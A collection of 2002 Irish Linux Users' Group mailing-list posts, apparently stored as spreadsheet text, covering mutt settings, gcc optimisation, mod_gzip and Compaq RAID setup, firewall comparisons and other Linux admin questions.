    <t xml:space="preserve">saw this on mutt users.  might be a handy trick for those of with
hyperactive archiving genes...  :)this might work better in this long run though:   set record='~/Mail/outbox-`date "+%Y-%m"`'On Sat, Jul 27, 2002 at 07:08:57PM +0200, Rocco Rutte wrote:
&gt; Hi,
&gt; 
&gt; * Dean Richard Benson [02-07-27 19:05:49 +0200] wrote:
&gt; 
&gt; [...]
&gt; &gt; So in my mutt config file I have this:
&gt; &gt; set record=Mail/outbox
&gt; 
&gt; &gt; ..that works a treat, except that its starting to grow a
&gt; &gt; little (after 4 months), and I think maybe the ability to
&gt; &gt; have an outbox folder and then for the above command to
&gt; &gt; auto-assign to the correct month?
&gt; 
&gt; What about:
&gt; 
&gt;   set record='~/Mail/outbox-`date "+%m"`'
&gt; 
&gt; You could also leave it as it currently is and use the
&gt;  function to view only mails within a specific 
&gt; date range.
&gt; 
&gt;    bye, Rocco
&gt; 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</si>
  <si>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If I want to use tcpd for ftp and only one user will ever ftp but I dont
know what IP that user is because its dialup DHCP how do I setup tcpd for
that user?
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, Jul 27, 2002 at 11:58:10AM -0700, Paul O'Neil wrote:
&gt; If I want to use tcpd for ftp and only one user will ever ftp but I dont
&gt; know what IP that user is because its dialup DHCP how do I setup tcpd for
&gt; that user?please don't reply to messages to send a new topic to ilug.  those of
us using threaded mail clients find that really annoying.tcpd is host based filtering/auth.  so if the ip is dynamic, you can't
really use it.  however ftp supports user based auth - actually it kind
of requires a user, so just set up an account for that person.kevin--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</si>
  <si>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John Gay wrote:
&gt; looking into these things. As Isaid, the PGCC site does not seem to have been 
&gt; updated in at least a year or more?!? I am also looking into GCC itself. Now 
&gt; that the 3.1. series is out, it might be better than when the PGCC patches 
&gt; were writtengcc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2.95 and later. &gt; The bottom line is, Pentiums have better instruction sets than
&gt; the original 386 instructions that they still support.Not really, no. The only instruction of consequence (to gcc anyway) 
since the i386 was the CMOV introduced with the Pentium Pro. gcc 2.95 
will use that instruction if directed to with -march=pentiumpro and you 
will generally get a few percent improvement out of it. Code compiled 
with that option will fail on Pentium and earlier processors.&gt; The Pentium also 
&gt; started introducing pipelining so properly generated code can be upto 30% 
&gt; faster than equivulent code that performs the same function!That's the art of instruction scheduling - rearranging the instructions 
generated by the compiler such that they make best use of the parallel 
("superscalar") pipelines present in a modern CPU. gcc 2.95 has a fair 
go at scheduling according to the -mcpu=pentium/pentiumpro option. gcc 
3.1 does a better job, and fine tunes for a few more processors such as 
athlon and athlon-xp. They're in the process of replacing the compiler's 
instruction scheduling with a whole new mechanism that should do an even 
better job, but that's a ways down the road yet in gcc 3.3.As for the exotic extra instructions sets, gcc 3.1 will make use of SSE 
or SSE2 instructions instead of 387 instructions if you use the 
-mfpmath=sse option and you may see some speed benefit from it, but 
there's a chance you may also see incompatibilities. gcc will still use 
i387 code for missing functionality in the SSE instruction set (double 
precision floats for example).AFAIK no current gcc will ever use MMX or 3DNOW! instructions though gcc 
3.1 enables user code to explicitly generate these instructions with C 
code. The kernel sometimes uses these instruction sets to get super-fast 
block copies of memory or RAID math but not much else.&gt; Not sure what improvements the P4 introduce? I think it's mostly just speed 
&gt; improvements rather than any execution changes.P4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AMD's x86-64 CPUs 
are said to have it as well. Of course x86-64 itself is a whole other 
ball game...Paul.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun 28 Jul 2002 06:29, ilug-admin@linux.ie wrote:
&gt; Message: 3
&gt; From: "John Moran" 
&gt; To: "ILUG" 
&gt; Subject: RE: [ILUG] Optimizing for Pentium Pt.2
&gt; Date: Sat, 27 Jul 2002 17:10:39 +0100
&gt;
&gt; gcc, glibc and binutils, which the lfs site says not to optimise,
&gt; already determines what system you're compiling on, and optimises itself
&gt; to that. That's my understanding of how it works anyway.
&gt;
&gt; John
&gt;
&gt; Subject: Re: [ILUG] Optimizing for Pentium Pt.2That was my understanding too, but I since fould out that for Linux:Most programs and libraries by default are compiled with optimizing level 2
(gcc options -g and -O2) and are compiled for a specific CPU. On Intel 
platforms software is compiled for i386 processors by default. If you don't
wish to run software on other machines other than your own, you might want to
change the default compiler options so that they will be compiled with a 
higher optimization level, and generate code for your specific architecture.Therefore:    export CFLAGS="-O3 -march=" &amp;&amp;
    CXXFLAGS=$CFLAGSThis is a minimal set of optimizations that ensures it works on almost all
platforms. The option march will compile the binaries with specific
instructions for that CPU you have specified. This means you can't copy this
binary to a lower class CPU and execute it.So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kernel.I'm still waiting for info from the GCC mailing list RE: optimising/patching 
GCC for performance improvement. So far the only suggestion has been to try 
using icc, Intels C compiler. It's known to work with the kernel, but user 
apps, and I guess libs and such might need rewriting to compile, and I'm not 
prepared to go to this length.For QT and KDE it seems there are also gains to be made with object 
pre-linking, but there are also risks with this so I'll just have to suck it 
and see. Either way, I'm going to get started building the base today. I'm 
still waiting for some DRI patches for my GVX1 card but it'll probably been 
several days before I'm ready to build X anyway.Cheers,	John Gay-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">two seperate projects this weekend.  first mod_gzip which is an apache
module to speed up serving static and dynamic mime(text/.*) web content.
the second is the compaq smart array configs for linux.before i go on much more i'll cover the following bits: the server
is running redhat 7.3 linux with all the updates on a compaq dl380.
the client is running the same on a compaq laptop.  pretty much everything
is stock redhat 7.3 - and i'm consciously trying to stick to that.------------------------------------------------------------------------
mod_gzip:
    there's a tutorial on linux.ie for it (thanks donnacha) but since i'm
    not an apache person this only got me part of the way.  step by step,
    this is what i did:	# cd /root
	# wget http://www.remotecommunications.com/apache/mod_gzip/src/1.3.19.1a/mod_gzip.c.gz
	# gunzip mod_gzip.c.gz
	# apxs -ic mod_gzip.c
    that should compile and install fine, so add the following to
    your apache configs.  i've included comments to explain where they
    should go.  my apache config is split among many files (which is
    why i didn't use the -a flag to apxs).	# put this after the last LoadModule line
	LoadModule gzip_module        /usr/lib/apache/mod_gzip.so
	# put this after the last LoadModule line
	AddModule mod_gzip.c
	# this just needs to go below the obove two lines.
	    mod_gzip_on                         Yes
	    mod_gzip_minimum_file_size          300
	    mod_gzip_maximum_file_size          0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httpd/unix-directory
	    mod_gzip_item_include               handler ^perl-script$
	    mod_gzip_item_include               handler ^server-status$
	    mod_gzip_item_include               handler ^server-info$
	    mod_gzip_item_exclude               file    \.css$
	    mod_gzip_item_exclude               file    \.js$
	    mod_gzip_item_exclude               mime    ^image/.*
	    mod_gzip_dechunk                    yes
	    # mod_gzip_min_http                 1000
	    mod_gzip_temp_dir                   /tmp
	    mod_gzip_keep_workfiles             No	    LogFormat "%h \"%f\" %{mod_gzip_result}n %{mod_gzip_input_size}n %{mod_gzip_output_size}n %{mod_gzip_compression_ratio}npct." mod_gzip_logs
	    CustomLog logs/compression_log mod_gzip_logs
	    finally, poke apache:	# service httpd reload    and after you've viewed some pages and check
    /var/log/httpd/compression_log in order to see if it's working.
    if you have /server-info avilable you should see that mod_gzip
    is loaded.  a compressed line and a non-compressed line might look
    like this:	roo "/.../ssl_glossary.html" OK 15092 4726 69pct.
	roo "/.../ssl_template.head-num-7.gif" DECLINED:EXCLUDED 0 0 0pct.------------------------------------------------------------------------
compaq smart array config:   (WARNING: YOU NEED A JVM FOR YOUR BROWSER)    i searched on google for "compaq smart array configuration linux" and
    got a slew of hits.  one of them was a click away from this page:	http://www.compaq.com/support/files/server/us/download/14703.html    i downloaded the rpm.  installed it. and ran the server per the
    instructions.  note, the -R enables remote connections.  if you're
    running the browser locally, run it without the -R and connect
    to localhost.	cpqacuxe -R    i found that galeon didn't work.  mozilla did.  i suspect it's because
    pop-ups are disabled in galeon config, but i might be wrong.  it uses
    java which is slow and memory hungry on this laptop.  feel free to
    try galeon with pop-ups enabled if you want to.    so, point mozilla at http://yourserver:2301/ .  login as
    administrator/administrator and change your password.  then go back
    to the main page and click the little drive array graphic towards
    the bottom.  configure your array as you want (i had to add a disk).
    save your changes, and exit.  to stop the server, just do this:	cpqacuxe -stop    in my case the drive was now accessible.  i started the process of
    making the file systems by partitioning the drive.  i knew what
    it would be called, but a grep for ida on the output of dmesg
    confirmed it.	fdisk /dev/ida/c0d1    and from there i built the filesystems and so on.hope this helps some folks,kevin-- 
Kevin Lyda - kevin@doolin.com
Lead Programmer
Doolin Technologies-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 28 Jul 2002, kevin lyda wrote:&gt; 	    mod_gzip_item_include               file    \.htm$
&gt; 	    mod_gzip_item_include               file    \.html$
&gt; 	    mod_gzip_item_include               file    \.txt$
&gt; 	    mod_gzip_item_include               file    \.php$
&gt; 	    mod_gzip_item_include               file    \.php3$
&gt; 	    mod_gzip_item_include               file    \.php4$
&gt; 	    mod_gzip_item_include               file    \.pl$
&gt; 	    mod_gzip_item_include               mime    text/.*
&gt; 	    mod_gzip_item_include               mime    httpd/unix-directory
&gt; 	    mod_gzip_item_include               handler ^perl-script$
&gt; 	    mod_gzip_item_include               handler ^server-status$
&gt; 	    mod_gzip_item_include               handler ^server-info$hmm.. add \.swf and \.class to list of files above that can do with
compressing.regards,
-- 
Paul Jakma	paul@clubi.ie	paul@jakma.org	Key ID: 64A2FF6A
Fortune:
No matter whether th' constitution follows th' flag or not, th' supreme
court follows th' iliction returns.
		-- Mr. Dooley
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Paul Kelly mentioned:
&gt; gcc has been as good as or better than pgcc for quite a while. pgcc was
&gt; was written back in the days when gcc splintered due to a perception of
&gt; slow progress on the main branch. A number of Linux distributions wound
&gt; up using egcs, partly derived from the pgcc work as I recall. Happiness
&gt; was restored to the world with gcc 2.95 and later.I do not have the time to follow the compiler "wars", but I notice that I
must use egcs to build 64 bit SPARC code.GCC 3 should do it, but because it is so "buggy"[1] it is not worth trying
to use unless you really want to track down those compiler errors... :(- Matthew[1] "buggy" in the sense that its a feature. Many of the problems with GCC 3
seem to be related to stricter syntax checking. More accurate information
will be appreciated.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</si>
  <si>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ok, so i was also learning about css this weekend (thanks to the fine
folks in irc.linux.ie, #linux!).  i came up with the following in
my travels.  first, two style sheets:http://ie.suberic.net/css/style.css:
    body {
	color : black;
	background-color : white;
    }http://ie.suberic.net/css/style-windows.css:
    body {
	background-image : url("http://ie.suberic.net/images/use.linux.gif");
	background-repeat: repeat;
    }then i include the css in an html page like so:
    blahnow i use mod_rewrite to rewrite requests for /css/style.css to
/css/style-windows.css if the browser is on windows by putting this
in httpd.conf:    RewriteEngine   on
    #RewriteLog     "/tmp/foo.log"  # use this for debugging
    #RewriteLogLevel        3
    RewriteCond     %{HTTP_USER_AGENT}      Windows
    RewriteRule     ^/css/style\.css$       /css/style-windows.cssoh, and of course images/use.linux.gif is an animated gif that is
transparent for 55 seconds and then displays "use linux!" in a large
blue font for 5 seconds.  :)and the way to create animated gifs is to put each frame in a layer in
the gimp.  pick any name for each layer, but make sure each layer ends
with (XXXms) where XXX is the number of milliseconds the frame displays.
then use the animation tool to export the animation.kevin--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</si>
  <si>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I've found that while my win2k box doesnt care what username/passwd it uses
the linux box wont work except using oceanfree/oceanfree. Whether this is a
machine or oceanfree issue I leave to yourself to decide.-----Original Message-----
From: Robert Synnott [mailto:r.synnott@oceanfree.net]
Sent: 27 July 2002 11:39
To: Liam Bedford; ilug@linux.ie
Subject: Re: [ILUG] [OT] Oceanfree Dial-up Number
Actually, they do; though they aren't case sensitive. It seems to have some 
trouble wtih PAP/CHAP authentication  as well; you might have to do it by 
script?On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â‚¬10 per second for tech support :-).
&gt;
&gt; 01-2434321
&gt; username: oceanfree
&gt; password: oceanfree
&gt;
&gt; don't think the username and password matter much though.
&gt;
&gt; L.--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</si>
  <si>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Matthew French wrote:
&gt;&gt;Happiness was restored to the world with gcc 2.95 and later.
&gt; I do not have the time to follow the compiler "wars", but I notice that I
&gt; must use egcs to build 64 bit SPARC code.2.95 was where the reintegration effort started and work on the other 
projects fell away. 3.0 was the target for completion of that work.&gt; GCC 3 should do it, but because it is so "buggy"[1] it is not worth trying
&gt; to use unless you really want to track down those compiler errors... :(A lot of those problems seem to have been shaken out by Redhat's ballsy 
gcc 2.96 stunt. I've been trying out RedHat Limbo for a few weeks now, 
equipped with gcc 3.1. I haven't fallen foul of compiler issue so far, 
that I'm aware of anyhow. That said I'm glad I don't do much C++ - seems 
pretty much every version of gcc (2.95, 2.96, 3.0, 3.1, and the 
forthcoming 3.2) breaks C++ binary compatibility in some way or other.Paul.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">kevin lyda wrote:
&gt; oh, and of course images/use.linux.gif is an animated gif that is
&gt; transparent for 55 seconds and then displays "use linux!" in a large
&gt; blue font for 5 seconds.  :)
&gt; 
&gt; and the way to create animated gifs is to put each frame in a layer in
&gt; the gimp.  pick any name for each layer, but make sure each layer ends
&gt; with (XXXms) where XXX is the number of milliseconds the frame displays.
&gt; then use the animation tool to export the animation.Nice trick.One thing - to save an image as an animated GIF (for example),
you just do a save as, and set the extension to .gif - you should
get a dialog asking whether you want to merge visible layers or
save as an animation. I believe that you can also specify the
extension as .mpg or .mpeg if you've got the mpeg plug-in built.Cheers,
Dave.-- 
       David Neary,
    Marseille, France
  E-Mail: bolsh@gimp.org-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, Jul 28, 2002 at 07:09:29PM +0100, kevin lyda mentioned:
&gt;     there's a tutorial on linux.ie for it (thanks donnacha) but since i'm
&gt;     not an apache person this only got me part of the way.  step by step,
&gt;     this is what i did:
&gt; 
&gt; 	# cd /root
&gt; 	# wget http://www.remotecommunications.com/apache/mod_gzip/src/1.3.19.1a/mod_gzip.c.gz
&gt; 	# gunzip mod_gzip.c.gz
&gt; 	# apxs -ic mod_gzip.c Thanks kevin...mod_gzip for the terminally lazy :)Kate
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 29 Jul 2002 05:02:23 +0100
Paul Kelly claiming to think:&gt; Matthew French wrote:
&gt; &gt;&gt;Happiness was restored to the world with gcc 2.95 and later.
&gt; &gt; I do not have the time to follow the compiler "wars", but I notice that I
&gt; &gt; must use egcs to build 64 bit SPARC code.
&gt; 
&gt; 2.95 was where the reintegration effort started and work on the other 
&gt; projects fell away. 3.0 was the target for completion of that work.
&gt; 
&gt; &gt; GCC 3 should do it, but because it is so "buggy"[1] it is not worth trying
&gt; &gt; to use unless you really want to track down those compiler errors... :(
&gt; 
&gt; A lot of those problems seem to have been shaken out by Redhat's ballsy 
&gt; gcc 2.96 stunt. I've been trying out RedHat Limbo for a few weeks now, 
&gt; equipped with gcc 3.1. I haven't fallen foul of compiler issue so far, 
&gt; that I'm aware of anyhow. That said I'm glad I don't do much C++ - seems 
&gt; pretty much every version of gcc (2.95, 2.96, 3.0, 3.1, and the 
&gt; forthcoming 3.2) breaks C++ binary compatibility in some way or other.
&gt; 
diary.codemonkey.org.uk [Dave Jones]:
 Got a mail from Neil telling me about some whizzy new warnings in the cvs 
version of gcc. Pulled it and spent a while playing with gcc, and after a 
few false starts got it to spit out a bunch of warnings when compiling the 
kernel. There's a boatload of stuff that still needs cleaning up for 2.5 
(Things like __FUNCTION__ abuse and the like). 2.4 doesn't even compile due 
to broken asm constraints and other such sillies. As 3.x isn't a recommended 
compiler for 2.4, this isn't too important just yet. As more and more archs 
start using 3.x for their standard compiler though, we should clean up some 
of this stuff for 2.5. The new warning Neil tipped me off about 
(-Wunused-macros)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gcc-&gt;c99 struct initialisers patch for instance 
made large parts of my tree reject. With more to come, the fun isn't over yet either.that is the CVS version, but it seems that more breakage is to come with the
kernel :((Everyone will want to compile their machine on the latest greatest... I think
they eventually persuaded Compaq's compiler to compile the kernel)...L.
-- 
     dBP   dBBBBb | If you're looking at me to be an accountant
              dBP | Then you will look but you will never see
   dBP    dBBBK'  | If you're looking at me to start having babies
  dBP    dB' db   | Then you can wish because I'm not here to fool around
 dBBBBP dBBBBP'   | Belle &amp; Sebastian (Family Tree)-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi All,Does anyone know if it is possible to just rename the cookie files, as in
user1@site.com -&gt; user2@site.com?
If so, what's the easiest way to do this.
The cookies are on a windows box, but I can smbmount the hard disk if this
is the best way to do it.Thanks,
	David.David Hamilton
Senior Technical Consultant
HP Ireland -- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,This might appear as a very strange email. Maybe it is ;)I'm french, and I'm currently studying in a engineer school in France,
called UTBM (http://www.utbm.fr). Next year, from February to July, I have
to do a practice somewhere in the world (in France or elsewhere).I'm a Linux user and developer since a couple of years now (I coordinate the
KOS project, http://kos.enix.org). That's why I'm looking for a practice in
which I can use Linux and/or develop Linux/BSD Software. I also prefer
working in a small company (&lt; 100 people). But since I've never been to
Ireland (that's why I want to discover this country), and since I have no
contact there, it is very difficult to find companies.So, I thought that the local Linux community maybe was able to help me by
giving some list of companies that are known to work with Linux/BSD or any
other free software.Thank you very much for your helpThomasThomas Petazzoni
thomas.petazzoni@non.hp.com
KOS : http://kos.enix.org
Perso : http://kos.enix.org/~thomas/ -- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">This sounds very similar to what was read on the internet spot on 2fm last
Thursday too.
-----Original Message-----
From: ilug-admin@linux.ie [mailto:ilug-admin@linux.ie]On Behalf Of
John_White@dell.com
Sent: 25 July 2002 13:53
To: ilug@linux.ie
Subject: [ILUG] BBC suggest using Linux over MS software
Near the top :
"One of the easiest ways to avoid many common [security] problems is to stop
using Microsoft software. "And further on :
"The ultimate step would be to use a Mac or install Linux on your PC..."cool !http://news.bbc.co.uk/2/hi/technology/2143630.stm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</si>
  <si>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Paul Jakma's [paulj@alphyra.ie] 53 lines of wisdom included:
&gt; true.
&gt; 
&gt; however, there are quite a few setup scripts available for 
&gt; ipchains/iptables, which can make config just as easy as ipfw.Well, that doesn't help you reading your listing.&gt; isnt the ipfw code in BSD brand-new aswell? (the old code was 
&gt; rewritten for OpenBSD recently due to licensing concerns).I think you're talking about IPFilter, and OpenBSD's new PF code.
Now who's talking FUD :)&gt; the above is a bit FUD'ish.Perhaps, although I think when seriously considering something like
a firewall, tried and trusted means a hell of a lot. IPFilter would
probably win that race.&gt; they're all much of a muchness really. probably best thing is:
&gt; 
&gt; - if you're more comfortable with BSD -&gt; ipfwI was talking in terms of the actual firewall. If the company in
question knows plenty about Linux and nothing about FreeBSD, I'd go
with a Linux box, merely because when something goes wrong (that
isn't got to do with ipfw/ipchains/ipfilter), then someone knows how
to fix it.As I said before, I have little to no in-depth experience with
netfilter, I'm aware of it's basic capabilities and had a quick look
at it's features in early 2.4 editions but that's it.-- 
  Philip Reynolds        
   RFC Networks          tel: 01 8832063
www.rfc-networks.ie      fax: 01 8832041-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 29 Jul 2002, Philip Reynolds wrote:&gt; Well, that doesn't help you reading your listing.i can read it fine. :)if you want readability - a good script is worth just as much.&gt; &gt; isnt the ipfw code in BSD brand-new aswell? (the old code was
&gt; &gt; rewritten for OpenBSD recently due to licensing concerns).
&gt; 
&gt; I think you're talking about IPFilter, and OpenBSD's new PF code.
&gt; Now who's talking FUD :)ah doh! yes.i thought the firewalling code on all the BSDs was fairly related -
sorry. So FreeBSD's ipfw is not encumbered in the same way the old
OBSD firewalling was?&gt; Perhaps, although I think when seriously considering something like
&gt; a firewall, tried and trusted means a hell of a lot. IPFilter would
&gt; probably win that race.to an extent, i guess so, yes. but i've a few boxes with reasonable 
uptimes that run netfilter/iptables. (i've one that has crashed twice 
now after 60+ day uptimes. but that doesnt seem to be netfilter).course, there's a lot more that can go wrong with a firewall than the
firewall code. in that case get 2 boxes and heartbeat them.&gt; I was talking in terms of the actual firewall. If the company in
&gt; question knows plenty about Linux and nothing about FreeBSD, I'd go
&gt; with a Linux box, merely because when something goes wrong (that
&gt; isn't got to do with ipfw/ipchains/ipfilter), then someone knows
&gt; how to fix it.indeed. couldnt agree more.(that's the nice thing about *nix - fact we /can/ have nit-picking 
arguments about which *nix and firewall code is better).&gt; As I said before, I have little to no in-depth experience with
&gt; netfilter, I'm aware of it's basic capabilities and had a quick
&gt; look at it's features in early 2.4 editions but that's it.i've no experience of ipfw. (closest i've come is looking at IPFilter 
for IRIX - but it had a problem in that it wasnt maintained 
anymore. however, while the englishy syntax is nice, i dont think 
iptables command  syntax is a big obstacle).anyway.. there's choice. and as i understand it, with the advent of 
netfilter/iptables there's now almost nothing between them from a 
technical POV. (apart from ipfw being in use a lot longer).regards,
-- 
Paul Jakma	paul@clubi.ie	paul@jakma.org	Key ID: 64A2FF6A
Fortune:
What a strange game.  The only winning move is not to play.
		-- WOP, "War Games"
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, 27 Jul 2002, kevin lyda wrote:&gt; On Sat, Jul 27, 2002 at 11:58:10AM -0700, Paul O'Neil wrote:
&gt; &gt; If I want to use tcpd for ftp and only one user will ever ftp but I dont
&gt; &gt; know what IP that user is because its dialup DHCP how do I setup tcpd for
&gt; &gt; that user?
&gt;
You could at the very least setup tcp wrappers and limit it to the dialup
domain name./etc/hosts.allowin.ftpd: .domain.name-kirk
&gt; please don't reply to messages to send a new topic to ilug.  those of
&gt; us using threaded mail clients find that really annoying.
&gt;
&gt; tcpd is host based filtering/auth.  so if the ip is dynamic, you can't
&gt; really use it.  however ftp supports user based auth - actually it kind
&gt; of requires a user, so just set up an account for that person.
&gt;
&gt; kevin
&gt;
&gt;
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Paul Jakma's [paul@clubi.ie] 67 lines of wisdom included:
&gt; i thought the firewalling code on all the BSDs was fairly related -
&gt; sorry. So FreeBSD's ipfw is not encumbered in the same way the old
&gt; OBSD firewalling was?Nope, indeed IPFW2 has just been rolled out into -STABLE. (-STABLE
is a stable branch of the code that has been rolled into -CURRENT
first. It's basically a major release, that's still a work in
progress)&gt; to an extent, i guess so, yes. but i've a few boxes with reasonable 
&gt; uptimes that run netfilter/iptables. (i've one that has crashed twice 
&gt; now after 60+ day uptimes. but that doesnt seem to be netfilter).
&gt; 
&gt; course, there's a lot more that can go wrong with a firewall than the
&gt; firewall code. in that case get 2 boxes and heartbeat them.I don't really judge things by uptimes, it's rather like judging
penis size. People like comparing them, and the larger they are, the
more people are in awe of them, but overly large ones aren't really
practical!&gt; indeed. couldnt agree more.
&gt; 
&gt; (that's the nice thing about *nix - fact we /can/ have nit-picking 
&gt; arguments about which *nix and firewall code is better).Defiantely. I wouldn't like anyone to accuse me of being a
nit-picker though ;)&gt; i've no experience of ipfw. (closest i've come is looking at IPFilter 
&gt; for IRIX - but it had a problem in that it wasnt maintained 
&gt; anymore. however, while the englishy syntax is nice, i dont think 
&gt; iptables command  syntax is a big obstacle).
&gt; 
&gt; anyway.. there's choice. and as i understand it, with the advent of 
&gt; netfilter/iptables there's now almost nothing between them from a 
&gt; technical POV. (apart from ipfw being in use a lot longer).Well, as someone who's used ipchains quite heavily about two years
ago, I can guarantee you that the learning curve for reading
ipchains rules and ipfw rules is quite different. Of course once
you've memorised (not necessarily sitting down with a sheet of them
and learning them off by rote) them, you wonder what all the fuss is
about before.It's not in itself a reason to choose one firewall product over
another, but if that's all there is in the difference, and the
learning curve for the Operating System is the same, then I know
what I'd prefer, as a beginner.This is all getting rather off-topic now anyways, but since I've
been doing quite a lot of work with ipfw over the last week I jumped
on the bandwagon.-- 
  Philip Reynolds        
   RFC Networks          tel: 01 8832063
www.rfc-networks.ie      fax: 01 8832041-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">[warning: veering further off topic]Philip Reynolds wrote:
&gt; Paul Jakma's [paul@clubi.ie] 67 lines of wisdom included:
&gt;&gt;i thought the firewalling code on all the BSDs was fairly related -
&gt;&gt;sorry. So FreeBSD's ipfw is not encumbered in the same way the old
&gt;&gt;OBSD firewalling was?ipfw was written specifically for FreeBSD under a bsd license by Luigi
Rizzo, who's one of the FreeBSD whizzes.  All three of the BSD's
packaged IPFilter, which has been around for donkeys years and which has
a slightly different feature set to ipfw.However,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re-invented the
wheel and called their firewall "pf", under a full-time BSD license.   The standard release versions of ipfilter are unencumbered, as always.&gt; Nope, indeed IPFW2 has just been rolled out into -STABLE. (-STABLE
&gt; is a stable branch of the code that has been rolled into -CURRENT
&gt; first. It's basically a major release, that's still a work in
&gt; progress)I'm not so sure that ipfw2 is really ready for production yet, having
only been mfc'd last wednesday.  It certainly adds some nice syntactic
sugar, and is apparently much faster for certain types of complex
rulesets.  It will be good once it's had some time to settle down a
little.&gt;&gt;i've no experience of ipfw. (closest i've come is looking at IPFilter 
&gt;&gt;for IRIX - but it had a problem in that it wasnt maintained 
&gt;&gt;anymore. however, while the englishy syntax is nice, i dont think 
&gt;&gt;iptables command  syntax is a big obstacle).ipfilter is quite nice, and is my current o/s firewall of choice.  It
has some nice features like the ability to save and restore state so
that connections are persistent across reboots, and its logging is
marginally better organised than ipfw's.  It's also very mature code,
which appeals to the rather conservative tastes of my old age.Nick-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Liam Bedford wrote:
&gt; that is the CVS version, but it seems that more breakage is to come with the
&gt; kernel :(Limbo seems to be able to compile its own kernel with its own gcc 3.1. 
That said, I don't want to know what kind of patches Redhat are applying 
to that kernel. The .spec file alone is 128KBytes! One of the patches is 
2.4.19-ac10. Redhat don't seem to have patched Limbo's gcc too heavily.Paul.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Ar mhaith le einne anseo caint le TG4 faoin LBW?Donncha.
----------  Forwarded Message  ----------Subject: Linux Beer Hike
Date: Tue, 30 Jul 2002 10:00:56 +0100
From: Diarmaid Mac Mathuna 
To: donncha.ocaoimh@tradesignals.comA Dhonncha, a chara,TÃ¡ mÃ© ag dÃ©anamh taighde don clÃ¡r teilifÃ­se An Tuath Nua (a bhÃ­onn Ã¡
chraoladh ar TG4) faoi lÃ¡thair, agus chonaic mÃ© go mbedih an Linux Beer
Hike ar siÃºl i Doolin i mbliana. Bheadh spÃ©is againn mÃ­r a dhÃ©anamh mar
gheall ar an Hike ar an gclÃ¡r - an mbeidh tÃº fÃ©in nÃ³ aon duine eile le
Gaeilge ar an Hike go bhfios duit?Go raibh maith agat as do chabhair,SlÃ¡n,Diarmaid_________________________
Diarmaid Mac MathÃºnaAgtel
37-39 Fitzwilliam Square, Dublin 2
37-39 PlÃ¡s Mhic Liam, Baile Ãtha Cliath 2Phone / FÃ³n: (01) 605 3737 / (086) 880 4187
Fax / Facs:  (01) 676 6137e-mail / r-phost: diarmaid.mac@agtel.ie
web / idirlÃ­on:   www.agtel.ie--------------------------------------------------------- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
Hi all,I have 3 or 4 email addresses (which get used for different
reasons), and I'd prefer not to mix them up. So I was wondering
if anyone knows of a way that I can have mail (apart from list
mail, which I have already sorted) which arrives to a certain
e-mail address have the From: header in the reply automatically
set to the address it came to.For example, say I have a company, and sales@company.com,
info@company.com and tech@company.com arrive in the same mailbox.
I don't want to reply to sales@company.com mails with the From:
set to dave@company.com, I would like the mail to come from
sales@company.com.Is there any way to do this? Bearing in mind that mail can arrive
with my email in the To or Cc fields (and Bcc?), and it might be
buried in a couple of dozen other recipients...Cheers,
Dave.-- 
       David Neary,
    Marseille, France
  E-Mail: bolsh@gimp.org-- 
